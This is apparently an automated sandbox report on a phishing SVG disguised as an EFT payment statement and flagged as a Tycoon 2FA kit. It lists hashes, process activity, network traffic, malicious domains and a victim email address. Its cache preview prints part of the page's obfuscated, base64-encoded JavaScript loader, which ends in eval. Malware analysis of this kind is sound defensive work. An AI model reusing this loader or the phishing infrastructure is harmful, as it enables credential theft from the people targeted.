Edit tour

Windows Analysis Report
34209QB_EFT_Payment_Statemt25.svg

Overview

General Information

Sample name:	34209QB_EFT_Payment_Statemt25.svg
Analysis ID:	1648371
MD5:	df3009fd04c34ceb770cbe399200ef82
SHA1:	96c923dc4d38524d6ce1b9b30a89b485d50e388f
SHA256:	a25b9a3ed5e7621eb483a54e9469ea76a615f5b7dd0005ba007266b6e91a726d
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA

Score:	96
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Yara detected AntiDebug via timestamp check

Yara detected HtmlPhish44

Yara detected Invisible JS

Yara detected Obfuscation Via HangulCharacter

Yara detected Tycoon 2FA PaaS

AI detected suspicious Javascript

HTML page contains suspicious javascript code

Creates files inside the system directory

Deletes files inside the Windows folder

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5632 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 4376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2080,i,16744422114225606758,16492851853540708457,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2116 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 8060 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\34209QB_EFT_Payment_Statemt25.svg" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_55	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

HTML

Source	Rule	Description	Author
1.2.d.script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.4.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
1.6.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
1.7..script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.2.d.script.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
1.4.d.script.csv	JoeSecurity_AntiDebugBrowser	Yara detected AntiDebug via timestamp check	Joe Security
1.0.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.1.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.0.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
1.1.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
Click to see the 5 entries

HTTP traffic detected: POST /report/v4?s=Lx06xBzWPo7%2F9kbsdxXpBkWA9qHIfLP%2BZVozx%2BU9JOqiuJxW%2Bgbclie2fL9XDcxVojG15W7SQ6mXxNayZbDk8ClMULOyKGV2Ti2B3CJklyx9ACBz7iE13yQLjHrm HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 429Content-Type: application/reports+jsonOrigin: https://zak9.rnltvipi.esUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 18:33:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lx06xBzWPo7%2F9kbsdxXpBkWA9qHIfLP%2BZVozx%2BU9JOqiuJxW%2Bgbclie2fL9XDcxVojG15W7SQ6mXxNayZbDk8ClMULOyKGV2Ti2B3CJklyx9ACBz7iE13yQLjHrm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=33234&min_rtt=33122&rtt_var=12501&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2231&delivery_rate=85985&cwnd=174&unsent_bytes=0&cid=3d286432d41f76b0&ts=57&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 92607fd9de5f4286-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=104164&min_rtt=103583&rtt_var=22727&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1897&delivery_rate=35360&cwnd=210&unsent_bytes=0&cid=5808ab6a3e836fc2&ts=3254&x=0"

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.7:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.232:443 -> 192.168.2.7:49692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.232:443 -> 192.168.2.7:49693 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.7:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.7:49701 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir5632_41557423

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir5632_41557423

Jump to behavior

Source: classification engine

Classification label: mal96.phis.evad.winSVG@23/6@8/7

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2080,i,16744422114225606758,16492851853540708457,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2116 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\34209QB_EFT_Payment_Statemt25.svg"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2080,i,16744422114225606758,16492851853540708457,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2116 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Malware Analysis System Evasion

Yara detected AntiDebug via timestamp check

Source: Yara match

File source: 1.4.d.script.csv, type: HTML

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://zak9.rnltvipi.es/ebY7FU/	100%	Avira URL Cloud	malware
https://zak9.rnltvipi.es/favicon.ico	100%	Avira URL Cloud	malware

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false	high
code.jquery.com	151.101.194.137	true	false	high
zak9.rnltvipi.es	104.21.65.232	true	false	high
www.google.com	142.250.81.228	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://zak9.rnltvipi.es/favicon.ico	false	Avira URL Cloud: malware	unknown
https://code.jquery.com/jquery-3.6.0.min.js	false		high
https://zak9.rnltvipi.es/ebY7FU/	true	Avira URL Cloud: malware	unknown
https://zak9.rnltvipi.es/ebY7FU/#Rcbeaty@hilcorp.com	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.81.228	www.google.com	United States	15169	GOOGLEUS	false
151.101.194.137	code.jquery.com	United States	54113	FASTLYUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
104.21.65.232	zak9.rnltvipi.es	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.7
192.168.2.16
192.168.2.9

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1648371
Start date and time:	2025-03-25 19:32:37 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	34209QB_EFT_Payment_Statemt25.svg
Detection:	MAL
Classification:	mal96.phis.evad.winSVG@23/6@8/7
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .svg

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, TextInputHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.251.41.14, 172.217.12.131, 142.251.32.110, 172.253.122.84, 142.251.40.174, 142.250.80.110, 142.250.176.206, 172.217.165.138, 142.250.65.170, 142.250.65.202, 142.250.176.202, 142.250.81.234, 142.251.32.106, 142.251.35.170, 142.251.40.106, 142.250.80.106, 142.250.80.42, 142.250.72.106, 142.250.80.10, 142.250.65.234, 142.251.40.138, 142.250.80.74, 142.251.40.170, 199.232.210.172, 142.251.40.110, 142.250.80.14, 142.250.65.206, 142.250.81.238, 142.251.40.163, 142.251.40.206, 142.251.35.163, 142.250.80.46, 142.250.65.174, 52.149.20.212, 184.31.69.3
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
151.101.194.137	http://2gewf232.blogspot.com.au/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery.min.js
	https://kjhgt55555555555.blogspot.com/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery.min.js
	http://kjhgt55555555555.blogspot.cz/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery.min.js
	http://facebooksecurity.blogspot.ro/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://facebooksecurity.blogspot.dk/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://soporte-store.info/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://mi-outlook-loggin.click/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.9.1.js
	http://facebooksecurity.blogspot.pe/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	https://tracker.club-os.com/campaign/click?qDomYmsgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=demsaenlinea.mx/jahn/00987667839933/utilities@affordablecare.com	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
104.21.65.232	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS, Tycoon2FA	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
code.jquery.com	TRANS_ADV_9290910137_.svg	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://ossin7fot.pelosfilhos.com.br?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	EFT Remittance_(Bobd)CQDM.htm	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.194.137
	https://nz.freshmnind.ru/E9nFcFhuAwW2u/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.66.137
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	151.101.130.137
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	151.101.194.137
	https://secure.login.spectraenergy.cloud/yvzxbcsocgyjefcrttuqeujvjbgyybwxwkuujihpdmmdclpmvxmpzzdmojzemkdeaktdiynhscwkzvbmzrybmlovaexkymrxowpdvwxlugipgzeeqtuevhdxbohklpivhzbugrhdckqrbhgsdbcejamnurzxhifphzniobifivkumujtexzzneftqymokjhnqkgytargddorrqcuszwcemqkrmhrhmfbelrfadrxlhuqjgffjlflsuwvggdcgnn/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.66.137
	https://gamma.app/docs/New-PDF-Document-Received-74vnbtewtf5iot8?mode=present#card-apfrnygx92ssvqt	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.66.137
	#Ud83d#Udd0aAudio_Msg Junklessfoods.xhtml	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	151.101.66.137
zak9.rnltvipi.es	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	104.21.65.232
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	172.67.194.65
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	172.67.194.65
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	104.21.65.232
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	104.21.65.232

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://h7xakreab.cc.rs6.net/tn.jsp?f=001IUYaStBwpYrrVxNfBJfByLTzAWRcrrwUoMNygpbojtbB6TtAi89a4a2FRDtojFqhfvSIc4Uz93djUdakzO8Sn0fmuys1qfTP_tc0dZAhuxkGBK-FgvFE48ItKM1lyOrHoPBpoMIfni7hm3TAjzQUXwdVcDUQDOvrhFGn_pYhQn1NYSo5bG8Bou1SjD1066-7mhClmcU1SIHJr8Ml1p5Ezh63uLJioDIpmuQDkSUKT5stA-q-wlha0lZ6TWjtDJj7ltcIMP07OFzecP1fXVjrcxCKdvZ5VipwA4_fP2aAXWzFm9bf8STTBTmlbxK_LKeX&c=nUnAMbVK4D5MtT_3I5Y3ewbim4Yt1n-k6xNv18Pi5CpCnSySlMU_MA==&ch=8g_9z5A1Rof9NJkmBjr85sK9m1ryqAZe6iauJac9DGBnIMcoCrELhw==	Get hash	malicious	Unknown	Browse	104.18.11.207
	CAPITAT SC 2025-2..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	http://87.121.221.113:8080/ps	Get hash	malicious	Unknown	Browse	1.1.1.1
	TRANS_ADV_9290910137_.svg	Get hash	malicious	HTMLPhisher	Browse	104.17.202.1
	Payment Copy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	NEW REQUEST FOR QUOTATION.scr.exe	Get hash	malicious	FormBook	Browse	172.67.138.55
	https://prapare.org/#	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://www.kuka-at.com	Get hash	malicious	Unknown	Browse	104.18.17.5
	IMFire Fire Technologies - DH-E240 Tech datasheet- Rollsis Levent Avm Projesi .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	https://ossin7fot.pelosfilhos.com.br?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.17.25.14
FASTLYUS	TRANS_ADV_9290910137_.svg	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://prapare.org/#	Get hash	malicious	Unknown	Browse	23.185.0.1
	https://ossin7fot.pelosfilhos.com.br?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	EFT Remittance_(Bobd)CQDM.htm	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.110.133
	https://nz.freshmnind.ru/E9nFcFhuAwW2u/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.108.133
	https://sj-lawfirm.com/	Get hash	malicious	Unknown	Browse	151.101.193.229
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	151.101.130.137
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	151.101.194.137
	https://sj-lawfirm.com/	Get hash	malicious	Unknown	Browse	151.101.129.229
	https://secure.login.spectraenergy.cloud/yvzxbcsocgyjefcrttuqeujvjbgyybwxwkuujihpdmmdclpmvxmpzzdmojzemkdeaktdiynhscwkzvbmzrybmlovaexkymrxowpdvwxlugipgzeeqtuevhdxbohklpivhzbugrhdckqrbhgsdbcejamnurzxhifphzniobifivkumujtexzzneftqymokjhnqkgytargddorrqcuszwcemqkrmhrhmfbelrfadrxlhuqjgffjlflsuwvggdcgnn/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.66.137

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (65364)
Category:	downloaded
Size (bytes):	911379
Entropy (8bit):	3.301871172344428
Encrypted:	false
SSDEEP:	768:TiHdFTv4q18YhbSbYwZiHdFTv4q18YhbSbWLkK9sqLkK9sb:mHbTg/bGHbTg/bWLB2qLB2b
MD5:	8E6EF5DCA189378DD4DC11F3E01EC364
SHA1:	D03091AD1522792A5714A289A5B806C606914A4F
SHA-256:	B14D213B3D9FDB0E05EEC15CF21467F19FD806131F0CE18CE7D95A60341E6658
SHA-512:	93A8939EED9F63A528A2C01661B070E47F2AAD0A139F05EAEC9A3ADA15307B8513AB9C8327FDF382ABA6573F2F8D117F697D833757149F82721FDE3C81851DCB
Malicious:	false
Reputation:	low
URL:	https://zak9.rnltvipi.es/ebY7FU/
Preview:	<script>.rTBRqAIaZV = atob("aHR0cHM6Ly96YWs5LnJubHR2aXBpLmVzL2ViWTdGVS8=");.OlZNulURlg = atob("bm9tYXRjaA==");.njMoIchKlb = atob("d3JpdGU=");.if(rTBRqAIaZV == OlZNulURlg){.document[njMoIchKlb](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RWRnZSxjaHJvbWU9MSI+CiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KICAgIDx0aXRsZT4mIzgyMDM7PC90aXRsZT4KICAgIDxzY3JpcHQ+CiAgICBjb25zdCBDcFd6dlNlQ0NoID0gewogIGdldCh3c2xrckNHeWx5LCB5bkJnZ3l6QlJrKSB7CiAgICBjb25zdCBYcG5UZ1ppa0FPID0gWy4uLnluQmdneXpCUmtdCiAgICAgIC5tYXAoVXdsY051Z1JTSyA9PiArKCfvvqAnID4gVXdsY051Z1JTSykpCiAgICAgIC5qb2luKCcnKTsKICAgIGNvbnN0IHF2eEhVeGVZRFcgPSBYcG5UZ1ppa0FPLnJlcGxhY2UoLy57OH0vZywgWGtBVEx4YW1EdSA9PgogICAgICBTdHJpbmcuZnJvbUNoYXJDb2RlKHBhcnNlSW50KFhrQVRMeGFtRHUsIDIpKQogICAgKTsKICAgIHJldHVybiBldmFsKHF2eEhVeGVZRFcpOwogIH0

Chrome Cache Entry: 56

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.5
Encrypted:	false
SSDEEP:	3:H+rYn:D
MD5:	F1C9C44E663E7E62582E3F5B236C1C72
SHA1:	E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
SHA-256:	D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
SHA-512:	19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCZCsGd--W9-hEgUNNzCpMCEyusk5Ewit8A==?alt=proto
Preview:	CgkKBw03MKkwGgA=

Chrome Cache Entry: 57

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:	1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://code.jquery.com/jquery-3.6.0.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Static File Info

General

File type:	data
Entropy (8bit):	3.6985513323166868
TrID:	Lumena CEL bitmap (63/63) 60.58% Corel Photo Paint (41/41) 39.42%
File name:	34209QB_EFT_Payment_Statemt25.svg
File size:	1'150 bytes
MD5:	df3009fd04c34ceb770cbe399200ef82
